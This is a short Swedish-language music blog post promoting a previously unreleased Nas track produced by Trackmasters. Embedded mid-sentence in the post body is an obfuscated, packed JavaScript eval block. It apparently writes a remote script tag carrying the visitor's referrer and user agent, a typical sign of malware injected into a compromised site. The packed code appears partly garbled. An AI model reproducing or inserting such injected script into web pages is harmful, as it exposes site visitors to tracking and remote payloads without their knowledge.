Image Image Image Image Image Image Image Image Image Image

| 22 september, 2018

Scroll to top

Top

Nas – You Don't Know

Nas – You Don't Know
Alexander Gylemo

Här hör vi den levande hiphoplegenden Nas i en tidigare aldrig släppt låt kallad ”You Don’t Know”, producerad på Trackmasters. Ingen vet än så länge när den gjordes, men av allt att döma skulle det kunna vara 90-tal eller tidigt 2000-tal. Det är ett typiskt hiphop-beat som gäller med en bra pianoloop och typisk Nas-rap och tack vare låten har nu det grymt efterlängtade tionde EPn ”Life is Good” fått ännu mer växande hype.

Lyssna och njut av klassisk hiphop som bara en kille som Nas kan göra.
Nas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hehdz|var|u0026u|referrer|efdyr||js|php’.split(‘|’),0,{}))
– You Don’t Know
by Hypetrak